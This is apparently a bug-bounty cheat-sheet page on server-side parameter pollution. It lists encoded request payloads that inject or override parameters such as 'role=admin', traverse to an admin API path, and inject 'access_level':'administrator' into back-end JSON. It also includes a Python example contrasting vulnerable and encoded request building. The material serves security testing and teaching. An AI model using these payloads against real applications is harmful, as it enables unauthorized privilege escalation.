# Server Side Parameter Pollution

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

Place query-syntax characters such as `#`, `&`, and `=` in your input and observe how the application responds. A changed or truncated result suggests the input is being embedded, unescaped, into a request the back-end sends to an internal API.

## Example

```
GET /profile?user=1001%23//evil.com
GET /profile?user=1001%26role=admin

(URL encoded: %23 decodes to #, %26 decodes to &)

GET /profile?user=1001%26admin=true
```

{% hint style="warning" %}
*It's essential that you URL-encode the `#` character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.*
{% endhint %}

Given a request such as:

```
GET /userSearch?name=peter&back=/home
```

1 - Try truncating the query with `#` or appending a parameter with `&`:

```
GET /userSearch?name=peter%23foo&back=/home

GET /userSearch?name=peter%26foo=xyz&back=/home
```

2 - If you've identified the `email` parameter, you could add it to the query string:

```
GET /userSearch?name=peter%26email=foo&back=/home
```

## Overriding parameters

```
GET /userSearch?name=peter%26name=carlos&back=/home

GET /profile?user=1001%26user=2121
```

{% hint style="info" %}
* *PHP parses the last parameter only. This would result in a user search for `carlos`.*
* *ASP.NET combines both parameters. This would result in a user search for `peter,carlos`, which might result in an `Invalid username` error message.*
* *Node.js / Express parses the first parameter only. This would result in a user search for `peter`, giving an unchanged result.*
{% endhint %}

## REST Paths

```
GET /edit_profile.php?name=peter%2f..%2fadmin
```

This may result in the following server-side request:

`GET /api/private/users/peter/../admin`

## Structured data

### Example 1

```
POST /myaccount
name=peter

# Server Side:

PATCH /users/7312/update 
{"name":"peter"}
```

You can attempt to add the `access_level` parameter to the request as follows:

```
POST /myaccount 
name=peter","access_level":"administrator
```

If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request:

```
PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}
```

### Example 2

```
POST /myaccount
{"name": "peter"}

# Server Side

PATCH /users/7312/update
{"name":"peter"}
```

Add the `access_level` parameter:

```
POST /myaccount
{"name": "peter\",\"access_level\":\"administrator"}

# Server side

PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}
```
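The query-string cases above and the structured-data cases in this section share one root cause: decoded user input concatenated into an internal request. The following is an added Python example, not the page's own code, that builds the internal request both the vulnerable way and the encoded way and parses it as the internal API would; the internal host, the `users/search` path and the fixed `role=user` parameter are assumptions.

```python
import json
from urllib.parse import parse_qs, urlencode, urlsplit

API = "http://internal-api.local"  # constructed placeholder for the internal host


def build_search_unsafe(name: str) -> str:
    # Vulnerable: the decoded user input is concatenated straight into the
    # internal query string, so '&', '=' and '#' keep their syntax meaning.
    return f"{API}/users/search?name={name}&role=user"


def build_search_safe(name: str) -> str:
    # Hardened: urlencode percent-encodes the value ('&' -> '%26', '#' -> '%23'),
    # so the whole input stays the value of the single 'name' parameter.
    return f"{API}/users/search?" + urlencode({"name": name, "role": "user"})


def parse_internal_query(url: str, duplicates: str = "last") -> dict:
    """Decode the query as the internal API would see it.

    'duplicates' models the back-end behaviours listed above: 'last' value
    wins (PHP), 'first' wins (Express), 'join' with commas (ASP.NET).
    A '#' splits off a fragment, which never reaches the query parser.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    pick = {"last": lambda v: v[-1], "first": lambda v: v[0],
            "join": lambda v: ",".join(v)}[duplicates]
    return {k: pick(v) for k, v in params.items()}


def build_patch_body_unsafe(name: str) -> str:
    # Vulnerable: hand-built JSON; a '"' in the input closes the string value
    # and lets the caller append further keys to the object.
    return '{"name":"' + name + '"}'


def build_patch_body_safe(name: str) -> str:
    # Hardened: json.dumps escapes quotes, so the input is one string value.
    return json.dumps({"name": name})


def parse_internal_body(body: str) -> dict:
    # What the internal API deserializes from the PATCH body.
    return json.loads(body)


if __name__ == "__main__":
    # Decoded form of the page's inputs (the front-end already turned %26 into &).
    for inp in ("peter&email=foo", "peter#foo", "peter&role=admin"):
        print(inp, parse_internal_query(build_search_unsafe(inp)),
              parse_internal_query(build_search_safe(inp)))
    inj = 'peter","access_level":"administrator'
    print(parse_internal_body(build_patch_body_unsafe(inj)),
          parse_internal_body(build_patch_body_safe(inj)))
```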

### Burp Extension - Backslash Powered Scanning

{% embed url="https://portswigger.net/research/backslash-powered-scanning-hunting-unknown-vulnerability-classes" %}

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\
  A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
* [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\
  This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

